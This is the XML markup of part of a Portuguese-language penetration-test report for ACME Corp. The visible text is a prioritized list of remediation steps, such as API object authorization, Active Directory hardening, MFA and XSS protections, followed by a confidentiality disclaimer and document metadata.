    <w:p w14:paraId="3ABF39AB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">Imediata: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Revisar a autorização por objeto na API (F-03) para conter exposição de PII.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55142478" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t xml:space="preserve">Curto prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Endurecer o Active Directory: gMSA para contas de serviço (F-04) e SMB signing (F-06).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7F726" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t xml:space="preserve">Curto prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Exigir MFA no acesso remoto (F-07) e aplicar CSP/sanitização contra XSS (F-05).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12612155" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Padronizar cabeçalhos de segurança/TLS (F-08) e reduzir divulgação de informação (F-09, F-10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33487A05" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Reexecutar o engajamento (reteste) para validar todas as correções.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DE35F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88BBFE" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Relatório gerado por Suricatoos a partir de um engajamento autorizado. Conteúdo confidencial; distribua apenas a partes autorizadas. As provas de conceito foram não destrutivas e limitadas ao escopo acordado.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00287A86">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>
      <w:headerReference w:type="first" r:id="rId19"/>
      <w:footerReference w:type="first" r:id="rId20"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="1080" w:header="708" w:footer="708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8E1EB7" w14:textId="77777777" w:rsidR="00421C89" w:rsidRDefault="00421C89">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="008F5AD4" w14:textId="77777777" w:rsidR="00421C89" w:rsidRDefault="00421C8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roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default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F9F988" w14:textId="2A1FE719" w:rsidR="00287A86" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="2" w:color="E2E8F0"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:t>Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="007550E1">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="007550E1">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13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3C8BA6" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00287A86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BE9C7A" w14:textId="77777777" w:rsidR="00421C89" w:rsidRDefault="00421C89">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F286B33" w14:textId="77777777" w:rsidR="00421C89" w:rsidRDefault="00421C8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0DC0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="2" w:color="E2E8F0"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="194FE3"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>SURICATOOS</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
      <w:tab/>
      <w:t>ACME Corp · CONFIDENCIAL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D99708" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00287A86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0811A26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A06A9290"/>
    <w:lvl w:ilvl="0" w:tplc="1EAE658E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="81A04992">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DC82E65C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D9D0A366">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0876D550">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F8FEECCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="07A80BC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D39CC322">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AB88F838">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="137527414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4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87A86"/>
    <w:rsid w:val="00287A86"/>
    <w:rsid w:val="00421C89"/>
    <w:rsid w:val="007550E1"/>
    <w:rsid w:val="00DE34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B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207B9743"/>
  <w15:docId w15:val="{6C70D57D-D1D1-7742-87ED-F39B102F46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lang w:val="en-BR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oter" Target="footer1.xml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header" Target="header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footer" Target="footer2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6</Pages>
  <Words>1801</Words>
  <Characters>10718</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>316</Lines>
  <Paragraphs>267</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12316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Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</dc:title>
  <dc:creator>Suricatoos</dc:creator>
  <cp:lastModifiedBy>William Souza de Lima</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2026-06-12T19:51:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-12T19:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T19:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>